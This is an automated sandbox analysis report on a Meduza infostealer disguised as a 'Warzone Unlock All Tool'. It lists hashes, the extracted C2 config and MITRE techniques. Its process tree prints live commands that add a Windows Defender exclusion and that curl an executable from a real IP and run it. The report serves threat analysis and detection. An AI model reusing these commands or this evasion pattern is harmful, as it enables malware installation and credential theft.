Analysis
-
max time kernel
438s -
max time network
444s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system -
submitted
16/03/2025, 10:30
Static task
static1
Behavioral task
behavioral1
Sample
Warzone_Unlock_All_Tool_2.2.zip
Resource
win11-20250313-en
Behavioral task
behavioral2
Sample
60212957b9a2f6732f160e0070b373fe.bak
Resource
win11-20250313-en
Behavioral task
behavioral3
Sample
Warzone_Unlock_All_Tool.exe
Resource
win11-20250313-en
Behavioral task
behavioral4
Sample
c11eb6b9290acb12dc21c3e0b9549701.log
Resource
win11-20250313-en
General
-
Target
Warzone_Unlock_All_Tool.exe
-
Size
201KB
-
MD5
2696d944ffbef69510b0c826446fd748
-
SHA1
e4106861076981799719876019fe5224eac2655c
-
SHA256
a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a
-
SHA512
c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb
-
SSDEEP
3072:gyOSSX7XA5RwkP10/Cg+ufLLobyT9S9jHkQPEZS0bGAPo:tEXjA5yBF+ma9jHfPITGb
Malware Config
Extracted
meduza
1
45.93.20.15
-
anti_dbg
true
-
anti_vm
true
-
build_name
1
-
extensions
.txt; .doc; .xlsx
-
grabber_maximum_size
4194304
-
port
15666
-
self_destruct
false
Signatures
-
Meduza Stealer payload 1 IoCs
resource yara_rule behavioral3/files/0x001d00000002af49-40.dat family_meduza -
Meduza family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4216 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 1 4708 curl.exe -
Executes dropped EXE 1 IoCs
pid Process 5092 1.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 api.ipify.org 5 api.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Warzone_Unlock_All_Tool.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4216 powershell.exe 4216 powershell.exe 5092 1.exe 5092 1.exe 5092 1.exe 5092 1.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4216 powershell.exe Token: SeDebugPrivilege 5092 1.exe Token: SeImpersonatePrivilege 5092 1.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4908 Warzone_Unlock_All_Tool.exe 4908 Warzone_Unlock_All_Tool.exe 4908 Warzone_Unlock_All_Tool.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4908 wrote to memory of 3644 4908 Warzone_Unlock_All_Tool.exe 78 PID 4908 wrote to memory of 3644 4908 Warzone_Unlock_All_Tool.exe 78 PID 4908 wrote to memory of 3644 4908 Warzone_Unlock_All_Tool.exe 78 PID 3644 wrote to memory of 4216 3644 cmd.exe 80 PID 3644 wrote to memory of 4216 3644 cmd.exe 80 PID 3644 wrote to memory of 4216 3644 cmd.exe 80 PID 4908 wrote to memory of 560 4908 Warzone_Unlock_All_Tool.exe 81 PID 4908 wrote to memory of 560 4908 Warzone_Unlock_All_Tool.exe 81 PID 4908 wrote to memory of 560 4908 Warzone_Unlock_All_Tool.exe 81 PID 560 wrote to memory of 4708 560 cmd.exe 83 PID 560 wrote to memory of 4708 560 cmd.exe 83 PID 560 wrote to memory of 4708 560 cmd.exe 83 PID 560 wrote to memory of 5092 560 cmd.exe 84 PID 560 wrote to memory of 5092 560 cmd.exe 84 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Warzone_Unlock_All_Tool.exe"C:\Users\Admin\AppData\Local\Temp\Warzone_Unlock_All_Tool.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4216
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -o 1.exe http://147.45.44.170/1.exe & start 1.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\SysWOW64\curl.execurl -o 1.exe http://147.45.44.170/1.exe3⤵
- Downloads MZ/PE file
PID:4708
-
-
C:\Windows\Temp\1.exe1.exe3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:5092
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:4068
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.2MB
MD540d39e1426b624e504f616d225b8e410
SHA1d7e633ca620078db8656623b00dddfefc842fe35
SHA2562e18b0a1b76f84de1008f468cbfb80d95258474e6fa53b20c70da9b974391c9a
SHA512baf7c93d9ecec4d85923bc7f70378867a82ff8175eb5bb1b20b00121775a201431b880de067980b26af0448c6c83e706b1fb5612e91ca6fbe7f4ea11b6199e25